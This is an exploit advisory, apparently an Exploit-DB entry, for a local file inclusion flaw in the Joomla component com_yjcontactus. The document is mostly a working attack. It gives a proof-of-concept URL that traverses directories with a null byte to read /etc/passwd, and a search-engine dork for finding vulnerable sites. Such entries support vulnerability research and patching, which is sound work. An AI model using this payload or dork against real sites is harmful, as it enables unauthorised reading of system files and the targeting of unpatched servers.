Joomla! Component com_yjcontactus - Local File Inclusion

Author: MeGo
type: webapps
platform: php
port: 
date_added: 2011-10-25 
date_updated: 2016-11-02 
verified: 0 
codes: OSVDB-76633 
tags: 
aliases:  
screenshot_url:  
application_url: 

================================================================================

  - YJ Contact us - Enhanced Joomla Contact Form <= Local File Inclusion Vulnerability

       Software : YJ Contact us - Enhanced Joomla Contact Form
       Vendor   : http://www.youjoomla.com/yj-contact-us-enhanced-joomla-contact-form-2.html
       Author   : Mego
       Contact  : nowar204[at]hotmail[dot]com
       Home     : NONE

================================================================================

  - Exploit

       http://localhost/[path]/index.php?option=com_yjcontactus&view=[LFI]


  - PoC

       http://localhost/[path]/index.php?option=com_yjcontactus&view=../../../../../../../../../../../../../../../../../../../etc/passwd%00


  - Dork

       "com_yjcontactus"+view

================================================================================

  - Greetz

       norgod,g0ld,vnc and all brazilian c0ders

================================================================================

  - October 25 2011 - Morocco